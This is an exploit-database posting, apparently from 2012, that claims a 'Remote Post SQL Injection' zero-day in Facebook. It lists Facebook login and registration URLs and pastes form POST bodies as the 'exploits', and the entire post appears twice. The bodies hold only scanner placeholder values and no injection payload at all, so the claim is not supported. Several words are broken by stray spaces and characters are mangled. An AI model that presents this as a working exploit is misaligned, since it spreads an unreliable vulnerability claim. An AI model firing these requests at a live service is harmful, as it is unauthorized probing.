[php]-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [x] Official Website: http://www.1337day.com 0
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
0 0
1 ========================================== 1
0 I'm Taurus Omar Member From Inj3ct0r TEAM 1
1 ========================================== 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
| |
| C _:_ A | Facebook - Remote Post SQL Injection | C _:_ A |
--------------------------------------------------------------------------
==> ABOUT ME:
--- TAURUS OMAR
--- INDEPENDENT SECURITY RESEARCHER
--- ACCESOILEGAL.BLOGSPOT.COM
--- @omartaurus
--- omar-taurus[at]dragonsecurity[dot]org
--- omar-taurus[at]live[dot]com
===> INFO:
Author : TAURUS OMAR
Category : Webapps / 0day
Title Exploit : Facebook - Remote Post SQL Injection
Vendor : Facebook
URL Vendor : http://www.facebook.com/
0day exploits : 1337day.com Inj3ct0r Exploit DataBase
==> SAMPLE REMOTE POST SQL INJECTION
http://www.facebook.com/login.php?login_attempt=1 [ Remote Post SQL Injection ]
http://www.facebook.com/r.php?possible_fb_user=1 [ Remote Post SQL Injection ]
http://www.facebook.com/r.php?locale=es_LA&possible_fb_user=1 [ Remote Post SQL Injection ]
http://www.facebook.com/find-friends/index.php^jsonp=1 [ Remote Post SQL Injection ]
https://www.facebook.com/r.php?fbpage_id=20531316728 [ Remote Post SQL Injection ]
==> EXPLOIT'S
+amp;extra_2=AdvertisingLink%3ACREATE_AN_AD&charse t_test=€,´,%E2%82%AC,%C2%B4,%E6%B0%B4,% D0%94,%D0%84&timezone=&lgnrnd=172128_Wkmc&lgnjs=n& locale=es_LA&lsd=AVo_L9kt&email=WCRTESTINPUT000000 &pass=WCRTESTINPUT000001&default_persistent=0&next =http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&e xtra_1=not-admgr-user
+trynum=1&charset_test=€,´,%E2%82%AC,%C 2%B4,%E6%B0%B4,%D0%94,%D0%84&timezone=&lgnrnd=1718 06_rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRT ESTINPUT000001&default_persistent=0&login=Entrar&l sd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return =1&display=&session_key_only=0
+display=&session_key_only=0&trynum=1&charset_test =€,´,€,´,?,?,?&timezone=&lgnrnd=171806_ rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTEST INPUT000001&default_persistent=0&login=Entrar&lsd= AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return =1
+login_str=wcrtestinput000000&password=wcrtestinpu t000001&lsd=avo_l9kt&importer_action=2&flow=2&type =1&callback_element_id=&tracked_params=[]
+charset_test=€,´,€,´,?,?,?&timezone=&l gnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000000 &pass=WCRTESTINPUT000001&default_persistent=0&logi n=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return =1&display=&session_key_only=0&trynum=1
+legacy_return=1&display=&session_key_only=0&trynu m=1&charset_test=€,´,€,´,?,?,?&timezone =&lgnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000 000&pass=WCRTESTINPUT000001&default_persistent=0&l ogin=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0
+r=115+reg_instance=whvet-ygwqujbcwr0iwc_jcb&openid_token=&uo_ip=&key=&re=&m id=&fid=®_dropoff_id=®_dropoff_code=&ro_invi te_signup_id=737818179100220658&terms=on&abtest_re gistration_group=1&referrer=&md5pass=&validate_mx_ records=1&asked_to_login=0&ab_test_data=&firstname =wcrtestinput000000&lastname=wcrtestinput000001&re g_email__=wcrtestinput000002®_email_confirmatio n__=wcrtestinput000003®_passwd__=wcrtestinput00 0004&captcha_persist_data=aznwcfsbvtu_hsnl9ddzwtkd 6b-l6k4sw6w5bf-7m80q4tuehmrrvmaoezd5uw_qan5757cni6lxooxdduakfouj-hhexh-gmmxfsuvdwouj5dkt_hfam-0xgtltzhe1kanr7x1m7s5wfqr75mukog2ylpcxdgo_nyz1-et-whce93nr-ddraaovwntqbpq0p-d-xkbv6-gmuklicm6bdc2zc_ffdx7nysuktmdlqgsutenuvgc3-rndgbfwuv7vlez9uvamllsjvp2hu7lmq2abyguj_prr5vv7euu huq8ebgq1arpbs9t7mdteq17stmys_ovowrc2eno9qzkspeh4b rsgx8oi6lg0yeccwspf4a&captcha_session=cmqamvx4apmp pd9boq5hew&extra_challenge_params=authp=nonce.tt.t ime.new_audio_default&psig=qgnx8ieq-k9hb0c3ceqwfzaavyi&nonce=cmqamvx4apmppd9boq5he w&tt=ducvyhgabbkslmk3pkqnmd16nqi&time=1339 980632&new_audio_default=1&recaptcha_type=pass word&captcha_response=wcrtestinput000005&sex=0&bir thday_day=-1&birthday_month=-1&birthday_year=-1&lsd=avo_l9kt&invid=&a=&oi=&locale=es_la&app_bund le=&app_data=®_data=&app_id=&fbpage_id=20531316 728®_oid=20531316728
# 1337day.com [2012-06-18][/php]
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [x] Official Website: http://www.1337day.com 0
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
0 0
1 ========================================== 1
0 I'm Taurus Omar Member From Inj3ct0r TEAM 1
1 ========================================== 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
| |
| C _:_ A | Facebook - Remote Post SQL Injection | C _:_ A |
--------------------------------------------------------------------------
==> ABOUT ME:
--- TAURUS OMAR
--- INDEPENDENT SECURITY RESEARCHER
--- ACCESOILEGAL.BLOGSPOT.COM
--- @omartaurus
--- omar-taurus[at]dragonsecurity[dot]org
--- omar-taurus[at]live[dot]com
===> INFO:
Author : TAURUS OMAR
Category : Webapps / 0day
Title Exploit : Facebook - Remote Post SQL Injection
Vendor : Facebook
URL Vendor : http://www.facebook.com/
0day exploits : 1337day.com Inj3ct0r Exploit DataBase
==> SAMPLE REMOTE POST SQL INJECTION
http://www.facebook.com/login.php?login_attempt=1 [ Remote Post SQL Injection ]
http://www.facebook.com/r.php?possible_fb_user=1 [ Remote Post SQL Injection ]
http://www.facebook.com/r.php?locale=es_LA&possible_fb_user=1 [ Remote Post SQL Injection ]
http://www.facebook.com/find-friends/index.php^jsonp=1 [ Remote Post SQL Injection ]
https://www.facebook.com/r.php?fbpage_id=20531316728 [ Remote Post SQL Injection ]
==> EXPLOIT'S
+amp;extra_2=AdvertisingLink%3ACREATE_AN_AD&charse t_test=€,´,%E2%82%AC,%C2%B4,%E6%B0%B4,% D0%94,%D0%84&timezone=&lgnrnd=172128_Wkmc&lgnjs=n& locale=es_LA&lsd=AVo_L9kt&email=WCRTESTINPUT000000 &pass=WCRTESTINPUT000001&default_persistent=0&next =http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&e xtra_1=not-admgr-user
+trynum=1&charset_test=€,´,%E2%82%AC,%C 2%B4,%E6%B0%B4,%D0%94,%D0%84&timezone=&lgnrnd=1718 06_rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRT ESTINPUT000001&default_persistent=0&login=Entrar&l sd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return =1&display=&session_key_only=0
+display=&session_key_only=0&trynum=1&charset_test =€,´,€,´,?,?,?&timezone=&lgnrnd=171806_ rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTEST INPUT000001&default_persistent=0&login=Entrar&lsd= AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return =1
+login_str=wcrtestinput000000&password=wcrtestinpu t000001&lsd=avo_l9kt&importer_action=2&flow=2&type =1&callback_element_id=&tracked_params=[]
+charset_test=€,´,€,´,?,?,?&timezone=&l gnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000000 &pass=WCRTESTINPUT000001&default_persistent=0&logi n=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return =1&display=&session_key_only=0&trynum=1
+legacy_return=1&display=&session_key_only=0&trynu m=1&charset_test=€,´,€,´,?,?,?&timezone =&lgnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000 000&pass=WCRTESTINPUT000001&default_persistent=0&l ogin=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0
+r=115+reg_instance=whvet-ygwqujbcwr0iwc_jcb&openid_token=&uo_ip=&key=&re=&m id=&fid=®_dropoff_id=®_dropoff_code=&ro_invi te_signup_id=737818179100220658&terms=on&abtest_re gistration_group=1&referrer=&md5pass=&validate_mx_ records=1&asked_to_login=0&ab_test_data=&firstname =wcrtestinput000000&lastname=wcrtestinput000001&re g_email__=wcrtestinput000002®_email_confirmatio n__=wcrtestinput000003®_passwd__=wcrtestinput00 0004&captcha_persist_data=aznwcfsbvtu_hsnl9ddzwtkd 6b-l6k4sw6w5bf-7m80q4tuehmrrvmaoezd5uw_qan5757cni6lxooxdduakfouj-hhexh-gmmxfsuvdwouj5dkt_hfam-0xgtltzhe1kanr7x1m7s5wfqr75mukog2ylpcxdgo_nyz1-et-whce93nr-ddraaovwntqbpq0p-d-xkbv6-gmuklicm6bdc2zc_ffdx7nysuktmdlqgsutenuvgc3-rndgbfwuv7vlez9uvamllsjvp2hu7lmq2abyguj_prr5vv7euu huq8ebgq1arpbs9t7mdteq17stmys_ovowrc2eno9qzkspeh4b rsgx8oi6lg0yeccwspf4a&captcha_session=cmqamvx4apmp pd9boq5hew&extra_challenge_params=authp=nonce.tt.t ime.new_audio_default&psig=qgnx8ieq-k9hb0c3ceqwfzaavyi&nonce=cmqamvx4apmppd9boq5he w&tt=ducvyhgabbkslmk3pkqnmd16nqi&time=1339 980632&new_audio_default=1&recaptcha_type=pass word&captcha_response=wcrtestinput000005&sex=0&bir thday_day=-1&birthday_month=-1&birthday_year=-1&lsd=avo_l9kt&invid=&a=&oi=&locale=es_la&app_bund le=&app_data=®_data=&app_id=&fbpage_id=20531316 728®_oid=20531316728
# 1337day.com [2012-06-18][/php]